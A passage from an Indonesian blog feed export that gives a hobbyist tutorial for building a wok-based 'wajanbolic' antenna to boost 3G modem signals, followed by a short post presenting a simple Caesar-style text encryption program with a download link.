<li><strong>Menggunakan Antena Luar</strong> dengan <strong>konektor terhubung</strong> pada internet modem/wireless. Cara ini seperti kita memasang antena TV dimana ada konektor dari kabel antena yang harus dihubungkan ke TV. Cara ini aman dan dapat Menguatkan Sinyal GPRS atau Sinyal 3G dengan sangat signifikan tetapi dengan syarat-syarat ; <strong>pertama</strong>, Antena harus sesuai dengan frekuensi kerja Device dan Impedansi Device. Karena apabila tidak ada kesesuaian maka sinyal bisa2 malah drop dan terjadi VSWR tinggi di dalam Device,…. device cepat panas dan bisa berakibat kerusakan,… ; <strong>kedua, </strong>Device harus memiliki soket untuk antena luar,… masalahnya tidak semua Modem internet memiliki fasilitas tersebut apalagi USB Wireless Internet LAN..; <strong>ketiga, </strong>harga sebuah antena eksternal yang bagus sangatlah mahal,…… bahkan mungkin lebih mahal dari Internet Modem/Wireless LANnya…..</li>
<li><strong>Menggunakan Extender USB</strong> atau <strong>perpanjangan USB,</strong> Cara ini merupakan cara paling aman dan murah untuk Menguatkan Sinyal GPRS atau Sinyal 3G meskipun harus sedikit ribet,… Pada cara ini Internet Modem/ Wereless LAN diletakkan pada tempat yang bebas atau sesedikit mungkin halangan antara modem internet dengan BTS atau Hotspot atau kalau bisa bebas hambatan/halangan artinya kalau modem dan BTS itu punya mata,… maka bisa saling melihat,… ini tentunya Device harus ditempatkan di ketinggian,.. ya benar,… kita bisa Membuat Extender USB dengan kabel UTP yang biasa digunakan untuk jaringan internet di Warnet dan menempatkan modem/wireless kita di atas rumah kita,………</li>
</ol><div>Selain untuk Menguatkan Sinyal GPRS, Sinyal 3G dan Sinyal Wireless LAN, cara-cara tersebut juga dapat digunakan untuk <strong>menguatkan Sinyal CDMA</strong> …</div><div>Src: realitiyekslusif.blogspot</div><h2 style="text-align: center;">Option Ke-Empat</h2><div><a href="http://alonrider.files.wordpress.com/2010/03/wajanbolic-on-the-air.jpg"><img alt="" class="aligncenter" height="304" src="http://alonrider.files.wordpress.com/2010/03/wajanbolic-on-the-air.jpg?w=450&h=304" title="wajanbolic on the air" width="450" /></a>Saya termasuk pengguna modem GSM 3G yang awalnya putus asa dengan koneksi internet. Sebabnya, sinyal yang didapat di rumah saya hanya GPRS. Padahal modem tersebut dan operatornya menyediakan koneksi HSDPA yang kecepatannya dua tingkat di atas GPRS. Setelah cukup lama merana cinta HSDPA, akhirnya saya memberanikan diri untuk membuat antena wajanbolic penguat sinyal 3G. Apalagi setelah saya tahu, tidak jauh dari area rumah (sekitar 2 km) ternyata ponsel saya mendeteksi adanya coverage 3G.<br />
Tutorial membuat antena wajanbolic penguat sinyal 3G/EVDO banyak bertebaran di internet. Ada pula sejumlah pihak, pribadi maupun perusahaan, yang menyediakan paket jadi wajanbolic.<br />
Saya awalnya berencana membeli paket wajanbolic. Namun, saya urungkan, karena dengan membeli saya tidak tahu ilmunya. Lagi pula tutorialnya banyak bertebaran di internet, dan sepertinya tidak begitu sulit membuatnya.<br />
Alhamdulillah berkat dukungan Mas Nono Elsabarto dan Mas Alvian yang “mengajar” melalui Facebook, akhirnya wajanbolic saya sukses mengudara. Saya merasa punya kewajiban moral untuk membaginya kepada brother semua. Siapa tahu ada yang bernasib sama dengan saya dan tak perlu fakir sinyal berlama-lama. Semoga berguna.<br />
<strong>Bahan Wajanbolic</strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/sebagian-bahan-wajanbolic.jpg"><img alt="" class="aligncenter" height="467" src="http://alonrider.files.wordpress.com/2010/03/sebagian-bahan-wajanbolic.jpg?w=450&h=467" title="sebagian bahan wajanbolic" width="450" /></a><br />
</strong><br />
Mudah diperoleh:<br />
<ul><li>Wajan diameter 32 inchi atau lebih. (Harga Rp 30 ribu).</li>
<li>Pipa PVC 4 inchi (sisa talang air).</li>
<li>Dop pipa PVC 4 inchi 2 buah (Rp 8 ribu)</li>
<li>Aluminium foil bungkus makanan. (Rp 10 ribu/gulung)</li>
<li>Double tape untuk perekat aluminium foil di pipa</li>
<li>Selotip 3M (pelindung sambungan kabel USB extender-UTP)</li>
<li>Selotip bening (lebar 4 cm) untuk pelindung aluminium foil.</li>
<li>Konektor N-female. (sekitar Rp 20 ribu)</li>
<li>Kawat tembaga diameter 1-2 mm. (Dari sisa kabel listrik tunggal).</li>
</ul><a href="http://alonrider.files.wordpress.com/2010/03/bracket-antena-dan-mur-baut.jpg"><img alt="" class="aligncenter" height="340" src="http://alonrider.files.wordpress.com/2010/03/bracket-antena-dan-mur-baut.jpg?w=450&h=340" title="bracket antena dan mur baut" width="450" /></a><br />
<ul><li>Bracket antena. (Rp 5 ribu per buah)</li>
<li>Plat L dudukan bracket. Bikin di tukang las Rp 5 ribu.</li>
<li>Pigtail dan konektor RP-SMA. Sesuaikan dengan konektor antena modem. (Rp 100 ribu).</li>
</ul><a href="http://alonrider.files.wordpress.com/2010/03/paket-pigtail-dan-rp-sma.jpg"><img alt="" class="aligncenter" height="368" src="http://alonrider.files.wordpress.com/2010/03/paket-pigtail-dan-rp-sma.jpg?w=450&h=368" title="paket pigtail dan RP-SMA" width="450" /></a><br />
<ul><li>Kabel coaxial berkualitas. Saya pakai <a href="http://www.kitani.co.id/menu.php?tampil=cbl_frequency">Kitani 5C</a>. (Rp 5 – 8 ribu per meter).<a href="http://alonrider.files.wordpress.com/2010/03/kabel-kitani-5c.jpg"><img alt="" class="aligncenter" height="383" src="http://alonrider.files.wordpress.com/2010/03/kabel-kitani-5c.jpg?w=450&h=383" title="kabel kitani 5c" width="450" /></a></li>
<li>Kabel UTP berkualitas. Untuk USB extender. (Rp 5 ribu per meter)</li>
<li>Kabel USB. (sekitar Rp 15 ribuan per buah).</li>
<li>Thermofit/selang bakar. Untuk pelindung sambungan USB-UTP. (Rp 5 ribu per meter).</li>
</ul><strong>Alat kerja</strong><br />
<strong> </strong><br />
<ol><li>Gergaji besi. Untuk memotong pipa.</li>
<li>Bor. Untuk melubangi wajan.</li>
<li>Penggaris. Untuk mengukur lokasi konektor.</li>
<li>Solder dan timah.</li>
<li>Tang lancip, tang potong.</li>
<li>Cutter atau pisau lipat.</li>
<li>Gunting.</li>
<li>Kunci Inggris, kunci pas, dan semacamnya. Untuk mengencangkan bracket antena dan konektor.</li>
</ol><strong>Kalkulator Wajanbolic</strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/skrinsyut-kalkulator-wajanbolic.jpg"><img alt="" class="aligncenter" height="460" src="http://alonrider.files.wordpress.com/2010/03/skrinsyut-kalkulator-wajanbolic.jpg?w=450&h=460" title="skrinsyut kalkulator wajanbolic" width="450" /></a><br />
</strong><br />
Yang paling penting dari pembuatan wajanbolic ini adalah pengukuran secara presisi jarak titik fokus, panjang paralon (feeder), dan penempatan konektor untuk access point. Kalkulator hitungan dapat diunduh <strong><a href="http://www.2shared.com/file/3543337/1af7c51e/Link_Budget_dan_Wajan_Calculator.html">di sini</a></strong>. Satuan hitungan kalkulator ini adalah milimeter. Jadi, harap hati-hati dalam mengkonversi ke cm.<br />
Lakukan penghitungan melalui kalkulator wajanbolic. Masukkan parameter seperti diameter wajan (D), kedalaman wajan (d), maupun titik fokus (f).<br />
Dari hasil pengukuran itu, wajan saya yang berdiameter 32 cm (D) dan kedalaman 7,5 cm (d) didapat titik fokus 8,5 cm.<br />
Sekarang kita mencari posisi RF Feed (bidang yang tertutup aluminium). Posisi RF feed adalah 3/4Lg. Dari hitungan kalkulator diperoleh panjang lapisan aluminium adalah 12,2 cm.<br />
Panjang pipa yang dibutuhkan adalah f + 3/4Lg = 8,5 + 12,2 cm = 20,7 cm.<br />
Potong pipa PVC sepanjang 20,7 cm. Tidak boleh kurang atau lebih.<br />
<strong>Menentukan Posisi Konektor</strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/diagram-hitungan-wajanbolic.jpg"><img alt="" class="aligncenter" height="314" src="http://alonrider.files.wordpress.com/2010/03/diagram-hitungan-wajanbolic.jpg?w=405&h=314" title="diagram hitungan wajanbolic" width="405" /></a><br />
</strong><br />
Selanjutnya menentukan posisi N-female konektor. Jaraknya dari ujung pipa adalah Lg/4. Dari kalkulator diperoleh angka 4 cm.<br />
Lubangi pipa PVC untuk posisi N-female konektor di posisi 4 cm dari ujung pipa.<br />
Kemudian tinggi kawat tembaga yang disolder ke N-female konektor adalah L/4. Diperoleh angka 3 cm dari pangkal baut. Solder kawat tembaga di ujung N-female konektor.<br />
<strong>Lapisan Aluminium</strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/penampang-tabung-aluminium.jpg"><img alt="" class="aligncenter" height="289" src="http://alonrider.files.wordpress.com/2010/03/penampang-tabung-aluminium.jpg?w=450&h=289" title="penampang tabung aluminium" width="450" /></a><br />
</strong><br />
Lapisi pipa PVC dengan aluminium foil sesuai panjang yang telah dihitung (12,2 cm). Jika ada lakban aluminium lebih bagus. Karena sekitar rumah saya sulit mendapatkan lakban aluminium maka saya menggantinya dengan aluminium foil makanan. Rekatkan dengan double tape.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/aluminium-dilapis-selotip-bening.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/aluminium-dilapis-selotip-bening.jpg?w=450&h=338" title="aluminium dilapis selotip bening" width="450" /></a><br />
Setelah itu, lapisi dengan selotip bening agar aluminium foil tidak mudah terkelupas akibat cuaca.<br />
Pasang N-female konektor yang telah disolder dengan kawat tembaga di lubang pipa.<br />
<a href="http://opensource.telkomspeedy.com/wiki/index.php/Wajanbolic_e-goen"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/n-type-female-konektor-dan-kawat-tembaga.jpg?w=450&h=338" title="N-type female konektor dan kawat tembaga" width="450" /></a><br />
N-female konektor tampak dalam.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/n-female-konektor-di-dalam-pipa-4-inchi.jpg"><img alt="" class="aligncenter" height="310" src="http://alonrider.files.wordpress.com/2010/03/n-female-konektor-di-dalam-pipa-4-inchi.jpg?w=450&h=310" title="N-female konektor di dalam pipa 4 inchi" width="450" /></a><br />
<strong>Merakit Wajanbolic</strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/dop-pvc-dilapis-aluminium-foil1.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/dop-pvc-dilapis-aluminium-foil1.jpg?w=450&h=338" title="dop PVC dilapis aluminium foil" width="450" /></a></strong><br />
<strong><a href="http://alonrider.files.wordpress.com/2010/03/dop-dilapis-aluminium-foil1.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/dop-dilapis-aluminium-foil1.jpg?w=450&h=338" title="dop dilapis aluminium foil" width="450" /></a><br />
</strong><br />
Siapkan satu dop pipa PVC yang bagian dalamnya telah dilapisi aluminium foil/lakban aluminium. Pastikan pinggir sisi dop juga dilapisi aluminium yang nantinya bersentuhan dengan pipa PVC yang telah dilapis aluminium foil.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/dop-4-inchi-terpasang-di-wajan.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/dop-4-inchi-terpasang-di-wajan.jpg?w=450&h=338" title="dop 4 inchi terpasang di wajan" width="450" /></a><br />
<a href="http://alonrider.files.wordpress.com/2010/03/wajanbolic-terpasang.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/wajanbolic-terpasang.jpg?w=450&h=338" title="wajanbolic terpasang" width="450" /></a><br />
Pasang dop pipa PVC satunya lagi untuk dipasang di tengah wajan. Kemudian satukan pipa PVC dan kedua dop sehingga menyatu dengan wajan. Agar kuat, sambungan pipa dan dop dapat diberi lem pipa. Pasang bracket antena dan plat besi L di bagian belakang wajan.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/bracket-antena-ke-tiang.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/bracket-antena-ke-tiang.jpg?w=450&h=338" title="bracket antena ke tiang" width="450" /></a><br />
<strong>Memasang Pigtail</strong><br />
<strong> </strong><br />
<a href="http://alonrider.files.wordpress.com/2010/03/pigtail1.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/pigtail1.jpg?w=450&h=338" title="pigtail" width="450" /></a><br />
Siapkan kabel coaxial dan pigtail yang nantinya terhubung ke colokan antena eksternal modem. Pemasangan konektor RP-SMA ke pigtail harap dilakukan hati-hati.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/pigtail-ke-kabel-antena2.jpg"><img alt="" class="aligncenter" height="322" src="http://alonrider.files.wordpress.com/2010/03/pigtail-ke-kabel-antena2.jpg?w=450&h=322" title="pigtail ke kabel antena" width="450" /></a><br />
Itu karena klem kabel hanya dapat dilakukan sekali tekan menggunakan tang. Jika meleset, akibatnya harus beli satu set konektor RP-SMA lagi. Selanjutnya pigtail dipasang ke colokan eksternal antena modem<br />
<a href="http://alonrider.files.wordpress.com/2010/03/pigtail-colok-ke-eksternal-antena-modem-zte-mf6221.jpg"><img alt="" class="aligncenter" height="338" src="http://alonrider.files.wordpress.com/2010/03/pigtail-colok-ke-eksternal-antena-modem-zte-mf6221.jpg?w=450&h=338" title="pigtail colok ke eksternal antena modem ZTE MF622" width="450" /></a><br />
<strong>Mengarahkan Antena</strong><br />
<strong> </strong><br />
Siapkan tiang untuk menegakkan wajanbolic. Bambu juga dapat digunakan. Cari yang lurus dan kokoh. Saya menggunakan bambu sepanjang 8 meter. Wajanbolic saya pasang mendekati ujung bambu.<br />
Setelah antena tegak dan stabil, colokkan pigtail ke modem dalam kondisi komputer dan software modem menyala. Putar antena wajan hingga mendapat sinyal terbaik (HSDPA/EVDO) dari BTS.<br />
Lebih baik jika kita lebih dahulu tahu dimana BTS yang “disangka” sebagai pemancar sinyal 3G/HSDPA/EVDO.<br />
<strong>Stabil itu Mutlak</strong><br />
Tidak selamanya sinyal terbaik itu fullbar. Tergantung dari kondisi geografis dan lingkungan kita, seperti; terhalang bangunan, bukit, atau pohon tinggi. Jika kita hanya mendapat 3 bar namun stabil, itu lebih dari cukup. Pengalaman saya yang hanya mendapat 3 bar sinyal HSDPA, namun stabil, terbukti mumpuni menjelajah, menampilkan video, dan mmengunduh situs-situs kelas berat seperti youtube dan semacamnya.<br />
<strong>Solusi Modem Panas</strong><br />
Salah satu kelemahan modem ZTE MF622 yang saya gunakan adalah cenderung panas dalam jangka waktu lama. Untuk mengurangi panas, modem itu saya bungkus aluminium foil.<br />
<a href="http://alonrider.files.wordpress.com/2010/03/modem-bungkus-aluminium.jpg"><img alt="" class="aligncenter" height="343" src="http://alonrider.files.wordpress.com/2010/03/modem-bungkus-aluminium.jpg?w=450&h=343" title="modem bungkus aluminium" width="450" /></a><br />
Nantinya akan saya pasang heatsink bekas prosesor jadul atau IC. Seperti yang diposting Onno W. Purbo <a href="http://opensource.telkomspeedy.com/wiki/index.php/Teknik_mendinginkan_modem_USB_3G_menggunakan_heatsink"><strong>di sini</strong>.</a><br />
Jika modem panas, meski sinyal HSDPA stabil, tetap tidak dapat terkoneksi. Solusinya, terpaksa memutus koneksi dan mematikan modem beberapa lama.<br />
Memasang kipas angin rumah tangga terbukti ampuh mengurangi panas modem tanpa harus hang. Efek sampingnya, saya malah masuk angin. <img alt=":mrgreen:" src="http://s2.wp.com/wp-includes/images/smilies/icon_mrgreen.gif?m=1276015845g" /><br />
<strong>Kuota Cepat Habis</strong><br />
<strong> </strong><br />
Sejauh ini antena wajanbolic yang saya buat sejak 23 Februari silam cespleng dalam menjaring sinyal HSDPA.<br />
<strong>Sebelum Menggunakan Wajanbolic</strong><br />
<a href="http://alonrider.files.wordpress.com/2010/03/gprs-im2.jpg"><img alt="" class="aligncenter" height="242" src="http://alonrider.files.wordpress.com/2010/03/gprs-im2.jpg?w=450&h=242" title="GPRS im2" width="450" /></a><br />
<strong>Setelah Memasang Wajanbolic </strong> <img alt=":-D" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1276015845g" /><br />
<a href="http://alonrider.files.wordpress.com/2010/03/skrinsyut-hsdpa-im2.jpg"><img alt="" class="aligncenter" height="266" src="http://alonrider.files.wordpress.com/2010/03/skrinsyut-hsdpa-im2.jpg?w=450&h=266" title="skrinsyut HSDPA IM2" width="450" /></a><br />
Efeknya, jatah 2GB per bulan dari operator selalu habis di dua minggu pertama awal bulan. Seterusnya terpaksa konek HSDPA dengan kecepatan 64Kbps hingga akhir bulan.<br />
Src: alonrider[.]wordpress[.]com<br />
Semoga Bermanfaat, Selamat Ber Internet Nyaman <img alt=":)" class="wp-smiley" src="http://www.binushacker.net/wp-includes/images/smilies/icon_smile.gif" /> <br />
</div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0tag:blogger.com,1999:blog-1756550600588610983.post-30912825355518713902011-05-22T08:41:00.000+07:002011-05-22T08:41:19.208+07:00Aplikasi Enkripsi Sederhana<div dir="ltr" style="text-align: left;" trbidi="on"><h2 class="post-title"> <a href="http://andratechnologycomputer.blogspot.com/2011/05/aplikasi-enkripsi-sederhana.html">Aplikasi Enkripsi Sederhana</a> </h2><span class="post-author"> </span> <div style="text-align: justify;">Satu lagi program kecil yang semoga bermanfaat jika saya bagikan disini kepada para pembaca. Ini adalah program yang akan mengenkripsi dan dekripsi teks yang mirip dengan algoritma Caesar Cipher. Bedanya, aplikasi ini akan memetakan setiap byte plainteks menjadi kode nomor ASCII. Kemudian dilakukan pergeseran sebesar n-kali. Dimana ‘n’ tersebut adalah private key anda (tidak boleh ada yang tau). Ya, ini adalah sebuah contoh symmetric algorithm (algoritma simetris) pada kriptografi.</div><div style="text-align: justify;"><span id="more-460"></span></div><div style="text-align: justify;">Langsung saja, beginilah tampilan programnya… SANGAT sederhana…</div><div style="text-align: justify;"><img alt="File Encrypter 1" src="http://blog.tibandung.com/wp-content/uploads/2010/12/file_encrypter1.jpg" title="File Encrypter 1" /></div><div style="text-align: justify;">Misalnya anda mengetikkan ‘rahasia’. Yang mana itu merupakan pesan rahasia anda nantinya.</div><div style="text-align: justify;">Kemudian klik File->Save dan muncul form yang menanyakan kepada anda kunci untuk mengenkripsi teks ‘rahasia’ tersebut. Saya menggunakan angka ’3527′ sebagai kunci rahasia saya. Aplikasi ini hanya men-support key-nya dalam bentuk angka (0-9).</div><div class="ezAdsense adsense adsense-midtext" style="float: left; margin: 12px;"> </div><div style="text-align: justify;"><img alt="File Encrypter 2" src="http://blog.tibandung.com/wp-content/uploads/2010/12/file_encrypter2.jpg" title="File Encrypter 2" /></div><div style="text-align: justify;">Kemudian jadilah file rahasia kita tersebut.</div><div style="text-align: justify;"><img alt="File yang Terenkripsi" src="http://blog.tibandung.com/wp-content/uploads/2010/12/file_encrypter3.jpg" title="File yang Terenkripsi" /></div><div style="text-align: justify;">Kirim kepada teman tujuan anda. Agar teman tujuan anda mengerti maksud pesan rahasia ini, harus menggunakan aplikasi File Encrypter ini juga, dan dengan key yang sama (dalam hal ini ’3527′) tentu saja. Selamat mencoba!</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Silahkan download File Encrypter <a href="http://inan.tibandung.com/pub/FileEncrypter.zip" title="File Encrypter">disini</a></div><div style="text-align: justify;">Bentuk: ZIP<br />
Terkompresi: ZIP<br />
Nama File: FileEncrypter<br />
Ukuran: 27 KB</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span class="fullpost"><i><b>HORMAT KAMI</b></i><br />
<i><b>ANDRA TECHNOLOGY COMPUTER</b></i><br />
<i><b>Sumber: http://blog.tibandung.com/aplikasi-enkripsi-sederhana/</b></i></span></div></div>ichankalberthttp://www.blogger.com/profile/10799786532003158075noreply@blogger.com0